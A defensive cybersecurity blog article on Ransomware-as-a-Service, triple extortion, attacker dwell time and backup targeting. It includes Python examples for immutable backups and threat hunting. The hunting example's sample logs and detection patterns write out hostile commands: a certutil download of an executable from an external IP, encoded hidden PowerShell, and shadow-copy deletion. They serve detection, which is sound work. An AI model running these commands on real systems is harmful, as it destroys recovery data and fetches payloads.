ComparEdge · cybersecurity · 14 min read

RaaS in 2026: Triple Extortion Killed Backup as Defense

Ransomware-as-a-Service in 2026 runs on affiliate franchises with 70/30 revenue splits and constant tooling upgrades. Triple extortion layers DDoS and data theft over encryption, and attackers map your backups during 21 days of silent dwell time before detonation.

Oleh Kem, Founder & Editor · May 15, 2026

Why did "just restore from backup" stop working?

For a decade, the standard advice for ransomware was straightforward: maintain good backups, test your restores, and you can tell the attackers to go away. This advice is now dangerously outdated, not because backups are unimportant (they are still essential) but because modern ransomware operators have adapted their business model specifically to neutralize backup-based recovery.

[Figure: Ransomware-as-a-Service triple extortion model in 2026: layered pressure beyond encryption]

TL;DR:

  • Average ransomware dwell time is 21 days; attackers explicitly map and target backup infrastructure before detonation.
  • Triple extortion adds DDoS, direct customer notification, and regulatory complaints on top of encryption and data theft.
  • Implement immutable backups with authentication separate from Domain Admin; behavioral EDR to catch living-off-the-land techniques.

The ransomware landscape in 2026 does not resemble the spray-and-pray campaigns of 2018. What we are dealing with is an organized criminal industry with revenue splits, affiliate programs, customer support, and product development cycles. Understanding the mechanics of this industry is the only way to build defenses that actually work.

How does Ransomware-as-a-Service actually operate?

RaaS operates on an affiliate model that would be familiar to anyone who has studied franchise businesses. The core operators - groups like the LockBit lineage, BlackCat/ALPHV successors, and newer entrants - develop and maintain the ransomware tooling. They provide the encryption software, negotiation platforms, data leak sites, and operational infrastructure.

Affiliates are the operators who actually breach networks and deploy the ransomware. They bring their own initial access methods - purchased credentials, phishing campaigns, exploitation of exposed services - and use the RaaS platform's tools for the final stages of the attack. The revenue split typically runs 70/30 or 80/20 in favor of the affiliate, though top-performing affiliates can negotiate better terms.

This model has several implications that defenders need to understand.

First, the barrier to entry is low. An affiliate does not need to write ransomware, build negotiation infrastructure, or manage cryptocurrency wallets. They need initial access skills and basic operational security. The RaaS platform handles everything else. This means the number of active threat actors is far larger than the number of ransomware "groups" that appear in threat intelligence reports.

Second, the tooling is constantly improving. Core operators reinvest profits into development, just like a legitimate software company. LockBit 3.0 introduced features like anti-analysis protections, configurable encryption speeds (faster encryption means less time for detection), and automated lateral movement capabilities. Each generation is harder to detect and faster to execute than the last.

Third, competition between RaaS platforms drives innovation. When one group introduces a new extortion technique, others adopt it within months. The market dynamics are identical to legitimate SaaS competition, except the product is extortion.

What exactly is triple extortion and why does it change the math?

Single extortion was simple: encrypt the data, demand payment for the decryption key. Backups defeated this. So attackers evolved.

[Figure: RaaS affiliate business model: revenue split structure and operator-affiliate relationship]

Double extortion added data exfiltration. Before encrypting, the attackers copy sensitive data to their infrastructure. Even if you restore from backup, they threaten to publish your customer data, financial records, source code, or internal communications. This is where "just restore from backup" started failing - restoration does not un-steal data.

Triple extortion adds additional pressure vectors on top of encryption and data theft. The third vector varies: DDoS attacks against your public-facing infrastructure while you are already struggling with the encryption, direct contact with your customers or business partners to inform them their data was stolen (weaponizing your business relationships), regulatory pressure by reporting your data breach to authorities before you can manage the disclosure, or targeting your clients and suppliers as secondary victims.

The mechanics of triple extortion are designed to eliminate every alternative to payment. Restoring from backup does not help, because your data has already been exfiltrated. You cannot quietly manage the incident, because the attackers are telling your customers. You cannot wait them out, because DDoS is taking down your revenue-generating systems. You cannot negotiate slowly, because they are filing regulatory complaints that create legal deadlines.

Each additional extortion vector increases the cost of non-payment while the ransom demand stays the same. The economics are deliberately structured to make payment the rational choice.

What happens during those 21 days of dwell time?

The average dwell time - the period between initial access and ransomware deployment - is approximately 21 days in 2026. Some operations are faster, some much longer. But understanding what happens during this period is critical because it is your only real detection window.

Days 1-3: Initial access and foothold. The affiliate gains access through a compromised VPN credential, an unpatched public-facing application, or a phishing email. They establish persistence - typically a reverse shell, a web shell, or a compromised remote access tool. The first action is almost always reconnaissance: whoami, ipconfig, net group "Domain Admins". These commands are legitimate tools used by legitimate administrators, which is exactly the problem.

Days 3-7: Lateral movement. The attacker moves through the network using living-off-the-land techniques. PsExec for remote execution. WMIC for system queries. Certutil for downloading additional tools (disguised as certificate operations). PowerShell for everything else. None of these trigger antivirus alerts because they are built-in Windows tools used by IT teams daily. The attacker maps the Active Directory environment, identifies high-value targets, and escalates privileges - often to Domain Admin within the first week.

Days 7-14: Preparation. This is where the attack specifically targets your recovery capabilities. The attacker identifies backup systems, backup schedules, backup storage locations, and backup retention policies. They identify your security tools and test whether their encryption payload will be detected. They often disable or modify Volume Shadow Copies. They may compromise the backup system itself, so that your "clean" backups contain their persistence mechanisms.

Days 14-21: Exfiltration and staging. Sensitive data is copied to attacker-controlled infrastructure. The exfiltration often uses legitimate cloud services - files uploaded to Mega, Google Drive, or Azure Blob Storage - to blend with normal traffic. The ransomware payload is staged across multiple systems. The attacker configures the deployment to execute simultaneously across the entire environment.

Day 21: Detonation. The ransomware deploys, typically during off-hours - Friday evening, holiday weekend, early morning. Every prepared system encrypts simultaneously. Backup systems are encrypted first. Active Directory is targeted to maximize disruption. The ransom note appears.

Why are backups the first target, not the last?

Modern ransomware affiliates are explicitly trained to prioritize backup infrastructure. The playbooks shared on dark web forums include specific instructions for identifying and neutralizing backup systems.

The mechanics are straightforward. If you are running Veeam, the attacker looks for the Veeam console and its database, identifies the backup repositories, and either encrypts them or deletes the backup chains. If you use cloud-based backup, they look for stored credentials to the backup service. If you have offline or air-gapped backups, they try to identify when the air-gapped media is connected and time their attack to encrypt both production and the most recent backup simultaneously.

The cautionary case here is brutal: an organization that invested heavily in backup infrastructure, tested restores quarterly, and believed it was ransomware-resilient. The attacker spent 47 days in the network - longer than average, specifically because the backup infrastructure was well-designed and required more time to map and compromise. By the time the ransomware deployed, the attacker had modified backup jobs to include encrypted copies of their own tooling, corrupted backup catalogs, and deleted the oldest backup chains that predated their access. The "clean" backups the organization restored from contained the attacker's persistence tools, leading to a second encryption event 11 days after the first.

Backups are necessary. Relying on backups as your primary ransomware defense, however, is a strategy that attackers have specifically engineered their operations to defeat.

What if the attacker knows your backup schedule better than your team does?

Imagine this: 47 days inside your network. The attacker has read every email from your IT team. They have watched your backup jobs execute on schedule. They know that your Veeam server runs full backups Sunday at 2 AM, incrementals every night at midnight, and that your tape rotation happens on the first Monday of each month. They know your retention policy keeps 30 days of disk-based backups and 90 days of tape.

They wait until Tuesday of the first week of a new month. The oldest tapes were just rotated out. The newest backup was last night. They encrypt the Veeam server, the backup repository, and every accessible tape. Your most recent clean backup is now 31 days old - beyond your disk retention. Your tapes from before the compromise are in a warehouse, but the catalog that tells you which tapes contain which data was on the Veeam server that is now encrypted.

You can rebuild from 31-day-old tapes, but you will lose a month of transactions, customer data, and work product. For a financial services firm, this is not just an inconvenience - it is a regulatory catastrophe. The cost of data reconstruction, regulatory fines, and customer notification exceeds the ransom demand by a factor of five.

This scenario is not theoretical. Variants of it appear in incident response reports regularly. The attacker's advantage is patience and total visibility into your environment.

Is paying the ransom actually rational?

Here is the controversial claim: in many cases, paying the ransom is the economically rational decision. This is not an endorsement - it is an observation about the math.

Consider an organization with $50 million in annual revenue. The ransomware has encrypted production systems, exfiltrated customer data, and DDoS attacks are taking down their website. The ransom demand is $2 million.

Cost of not paying: estimated 3-4 weeks of downtime ($3-4 million in lost revenue), incident response and recovery costs ($500K-$1M), customer notification and credit monitoring ($200K-$500K), regulatory fines for the data breach ($500K-$2M), reputational damage (unquantifiable but significant), potential lawsuits from affected customers ($1M+). Total: $5-8 million minimum.

Cost of paying: the $2 million ransom, plus incident response costs that are still necessary ($500K), plus the data breach that still has to be addressed ($500K-$1M). Total: $3-3.5 million.

The math says pay. The FBI says do not pay. Insurance companies increasingly refuse to cover ransom payments. And there is no guarantee the decryption key works - roughly 80% of the time it does, but 80% is not 100%.

The rational response is not "never pay" or "always pay" - it is "build defenses that make this calculation unnecessary." But pretending that payment is never rational ignores the reality that executives face during an active incident.

What should the CTO prioritize?

The CTO needs to accept that ransomware defense is not about any single control. It is about increasing the cost and time required for the attacker at every stage.

Network segmentation that actually works - not just VLANs on a diagram, but enforced microsegmentation that prevents lateral movement from a compromised workstation to backup infrastructure. This is hard to implement and maintain, which is why most organizations do not actually do it.

Endpoint detection and response that catches living-off-the-land techniques. Traditional antivirus is useless against PsExec and PowerShell. You need behavioral detection that identifies suspicious patterns - a user account that has never used PsExec suddenly executing it on 50 machines at 3 AM.

Immutable backups that cannot be modified or deleted, even by an administrator with full access. This means backup infrastructure with separate authentication (not Domain Admin), air-gapped or append-only storage, and backup monitoring that alerts on unexpected deletion or modification.
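The two properties just described (deletion refused until a retention lock expires, regardless of who asks, and a catalog copy held outside the domain so a corrupted or emptied backup chain is noticed before you need it) can be modelled in a few dozen lines. The following is an added example, not Veeam's or any vendor's code; the repository, the HMAC key, the backup names and the 30-day timeline are all constructed for the demo. The "tampered catalog" and "storage-level loss" steps are the scenarios from the 47-day case above, reproduced in miniature.

```python
"""
Toy retention-locked (append-only) backup repository with an out-of-band
catalog. Added example; not a real product's API. Everything here is
constructed: key, object names, dates.
"""
import hashlib
import hmac
import json
from datetime import datetime, timedelta

# Held by the backup authority, never by Domain Admin (constructed demo key).
CATALOG_HMAC_KEY = b"demo-key-held-outside-the-domain"


class RetentionLockedRepo:
    """Objects can be written once and deleted only after their lock expires."""

    def __init__(self, retention_days):
        self.retention = timedelta(days=retention_days)
        self.objects = {}  # name -> {"sha256": hexdigest, "locked_until": datetime}
        self.audit = []    # lines a backup monitor would forward as alerts

    def write(self, name, data, now):
        if name in self.objects:                     # append-only: no overwrite
            self.audit.append(f"ALERT overwrite attempt on {name}")
            return False
        self.objects[name] = {"sha256": hashlib.sha256(data).hexdigest(),
                              "locked_until": now + self.retention}
        return True

    def delete(self, name, principal, now):
        obj = self.objects.get(name)
        if obj is None:
            return False
        if now < obj["locked_until"]:                # lock applies to every principal
            self.audit.append(f"ALERT {principal} tried to delete {name} "
                              f"before lock expiry {obj['locked_until'].date()}")
            return False
        del self.objects[name]
        self.audit.append(f"INFO {principal} deleted expired {name}")
        return True

    def catalog(self):
        """Serialise name->hash and authenticate it for off-host storage."""
        body = json.dumps({n: o["sha256"] for n, o in sorted(self.objects.items())})
        mac = hmac.new(CATALOG_HMAC_KEY, body.encode(), hashlib.sha256).hexdigest()
        return body, mac


def verify_catalog(repo, trusted_body, trusted_mac):
    """Compare the live repository against the out-of-band catalog copy."""
    expected = hmac.new(CATALOG_HMAC_KEY, trusted_body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, trusted_mac):
        return {"catalog_ok": False, "missing": [], "modified": []}
    trusted = json.loads(trusted_body)
    missing = [n for n in trusted if n not in repo.objects]
    modified = [n for n in trusted
                if n in repo.objects and repo.objects[n]["sha256"] != trusted[n]]
    return {"catalog_ok": True, "missing": missing, "modified": modified}


def run_scenario():
    """Constructed timeline: weekly fulls, 30-day lock, attacker acts on day 21."""
    repo = RetentionLockedRepo(retention_days=30)
    day0 = datetime(2026, 3, 1, 2, 0)
    for d in (0, 7, 14):
        when = day0 + timedelta(days=d)
        repo.write(f"full-{when.date()}.bak", b"full backup %d" % d, when)
    body, mac = repo.catalog()                   # copied off-host right away
    result = {}
    attack = day0 + timedelta(days=21)
    # Domain Admin asks for the oldest chain to go: refused, alert raised.
    result["deleted"] = repo.delete("full-2026-03-01.bak", "CORP\\Administrator", attack)
    result["alerts"] = [a for a in repo.audit if a.startswith("ALERT")]
    result["live_vs_trusted"] = verify_catalog(repo, body, mac)
    # Attacker rewrites the catalog stored on the backup server itself.
    result["tampered_catalog"] = verify_catalog(repo, body.replace("03-08", "02-08"), mac)
    # Simulated deletion below the API (e.g. at the storage layer): caught by the check.
    repo.objects.pop("full-2026-03-08.bak")
    result["after_storage_loss"] = verify_catalog(repo, body, mac)
    # Legitimate expiry-driven deletion by the backup authority after the lock.
    result["post_expiry"] = repo.delete("full-2026-03-01.bak", "backup-admin",
                                        day0 + timedelta(days=31))
    return result


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

The point to notice is that the catalog HMAC key and the retention clock are enforced by the repository, not by whoever holds Domain Admin; the same separation is what object-lock style storage gives you in production, and the verify step is the "monitoring that alerts on unexpected deletion" run as a scheduled job rather than waiting for a restore to fail.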

[Figure: Ransomware EDR tools comparison: SentinelOne, CrowdStrike, and Huntress for behavioral detection]

Tool | What it does | Complexity | Main weakness
--- | --- | --- | ---
SentinelOne | AI-driven EDR, automated response, ransomware rollback | Medium | Rollback only works for files modified after agent deployment
CrowdStrike | Cloud-native EDR, threat intelligence, managed hunting | Medium | Premium pricing, Falcon platform sprawl
Huntress | Managed EDR focused on SMB, persistent foothold detection | Low | Less suited for large enterprise environments
Fortinet | Network security, segmentation, integrated SD-WAN | High | Complexity of FortiOS ecosystem, integration overhead
Trellix | XDR platform, email security, endpoint protection | High | Post-merger integration issues, console fragmentation

What does SecOps need to detect?

SecOps needs to shift from alert-based detection to pattern-based hunting. The individual actions in a ransomware attack are all legitimate activities. The pattern is what distinguishes an attack from normal operations.

A Domain Admin using PsExec is normal. A Domain Admin using PsExec on 200 machines in sequence at 2 AM is not. Certutil downloading a file is normal. Certutil downloading an executable from an external URL is not. PowerShell running scripts is normal. PowerShell running encoded commands that decode and execute in memory is suspicious.

The 21-day dwell time is actually an advantage for defenders - if you are looking. Most organizations are not, because their security operations are built around alert triage rather than threat hunting.
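The hunting logic this section describes, and the living-off-the-land activity from the dwell-time timeline above (recon bursts, certutil fetching from outside, encoded PowerShell, shadow copy deletion, PsExec fan-out at night), is concrete enough to write down. Below is an added example, not code from the article or from any EDR vendor: a small Python hunt over constructed process-creation records (timestamp, host, user, command line). The rule names, thresholds (3 distinct recon commands in 5 minutes, 5 or more PsExec targets in 10 minutes, 22:00-06:00 as off-hours) and the sample hosts, users and IP addresses are all assumptions chosen for the demo; the point is that each rule scores a pattern across events or arguments, not a single command.

```python
"""
Pattern-based hunting over process-creation telemetry.
Added example; thresholds, names and log lines are constructed.
Record format assumed here: "<ISO timestamp> <host> <user> <command line>".
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

RECON_CMDS = ("whoami", "ipconfig", "net group", "net user", "nltest", "systeminfo")
# External = anything that is not a private/loopback address (demo heuristic).
EXTERNAL_URL = re.compile(r"https?://(?!10\.|192\.168\.|127\.)[^\s]+", re.I)
ENCODED_PS = re.compile(r"\bpowershell(\.exe)?\b.*\s-(enc|encodedcommand|ec)\b", re.I)
SHADOW_DELETE = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)
PSEXEC_TARGET = re.compile(r"\bpsexec(\.exe)?\s+\\\\([\w.-]+)", re.I)

# Constructed sample telemetry: one night's activity plus benign daytime admin work.
SAMPLE_EVENTS = [
    "2026-03-02T02:05:10 WS-0417 CORP\\jdoe whoami",
    "2026-03-02T02:05:12 WS-0417 CORP\\jdoe ipconfig /all",
    "2026-03-02T02:05:15 WS-0417 CORP\\jdoe net group \"Domain Admins\" /domain",
    "2026-03-02T02:40:00 WS-0417 CORP\\jdoe certutil -urlcache -split -f http://203.0.113.7/update.exe update.exe",
    "2026-03-02T02:45:00 WS-0417 CORP\\jdoe powershell -nop -w hidden -EncodedCommand SQBFAFgA",
    "2026-03-03T02:10:00 WS-0417 CORP\\jdoe vssadmin delete shadows /all /quiet",
] + [
    f"2026-03-03T02:1{i}:00 SRV-JUMP01 CORP\\svc-deploy psexec \\\\WS-010{i} -s cmd /c C:\\tmp\\run.bat"
    for i in range(6)
] + [
    # Benign: single target during business hours, internal CA download, plain script.
    "2026-03-03T14:00:00 WS-0090 CORP\\admin.ops psexec \\\\SRV-FILE01 -s cmd /c hostname",
    "2026-03-03T14:05:00 WS-0090 CORP\\admin.ops certutil -urlcache -split -f http://10.0.0.5/ca.crt ca.crt",
    "2026-03-03T14:10:00 WS-0090 CORP\\admin.ops powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]


def parse(line):
    ts, host, user, cmd = line.split(" ", 3)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd}


def single_event_findings(ev):
    """Rules that need only the arguments of one command line."""
    out, cmd = [], ev["cmd"]
    low = cmd.lower()
    if low.startswith("certutil") and "-urlcache" in low and EXTERNAL_URL.search(cmd):
        out.append("certutil_external_download")
    if ENCODED_PS.search(cmd):
        out.append("encoded_powershell")
    if SHADOW_DELETE.search(cmd):
        out.append("shadow_copy_deletion")
    return out


def recon_bursts(events, window=timedelta(minutes=5), min_distinct=3):
    """Same user on same host running several distinct recon commands quickly."""
    by_actor = defaultdict(list)
    for ev in events:
        name = next((r for r in RECON_CMDS if ev["cmd"].lower().startswith(r)), None)
        if name:
            by_actor[(ev["user"], ev["host"])].append((ev["ts"], name))
    findings = []
    for (user, host), hits in by_actor.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            seen = {n for t, n in hits[i:] if t - t0 <= window}
            if len(seen) >= min_distinct:
                findings.append({"rule": "recon_burst", "user": user, "host": host,
                                 "commands": sorted(seen)})
                break
    return findings


def psexec_fanout(events, window=timedelta(minutes=10), min_hosts=5, night=(22, 6)):
    """One account reaching many distinct hosts via PsExec in a short window."""
    by_user = defaultdict(list)
    for ev in events:
        m = PSEXEC_TARGET.search(ev["cmd"])
        if m:
            by_user[ev["user"]].append((ev["ts"], m.group(2).upper()))
    findings = []
    for user, hits in by_user.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            targets = {h for t, h in hits[i:] if t - t0 <= window}
            if len(targets) >= min_hosts:
                off_hours = t0.hour >= night[0] or t0.hour < night[1]
                findings.append({"rule": "psexec_fanout", "user": user, "hosts": len(targets),
                                 "off_hours": off_hours, "start": t0.isoformat()})
                break
    return findings


def hunt(lines):
    events = sorted((parse(l) for l in lines), key=lambda e: e["ts"])
    findings = []
    for ev in events:
        for rule in single_event_findings(ev):
            findings.append({"rule": rule, "user": ev["user"], "host": ev["host"], "cmd": ev["cmd"]})
    findings += recon_bursts(events)
    findings += psexec_fanout(events)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

Run against the sample, the admin.ops activity produces nothing, which is the property that matters: the same binaries are in both halves of the log, and only the combination of account, count, timing and argument shape separates the two.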

[Figure: Ransomware layered defense: EDR, immutable backups, segmentation, and cost escalation model]

What does the CFO need to budget for?

The CFO needs to understand that ransomware risk is now a board-level financial risk, not an IT problem. The expected annual loss from ransomware for a mid-size enterprise is no longer theoretical - it is calculable from industry data.

Cyber insurance premiums have tripled since 2022, and underwriters now require specific controls before issuing policies. If your organization cannot demonstrate EDR deployment, MFA coverage, backup immutability, and network segmentation, you may not qualify for coverage at any price.

The budget conversation should include: EDR licensing ($15-30 per endpoint per month), network segmentation implementation ($200K-$500K for a mid-size environment), backup infrastructure upgrades ($100K-$300K), incident response retainer ($50K-$150K annually), and security operations staffing or managed detection and response ($200K-$500K annually).

This is expensive. A ransomware incident is more expensive. The CFO's job is to quantify both sides and present the board with an informed risk decision.



Ransomware defense requires layered investment. EDR alone is not enough without immutable backups and network segmentation.
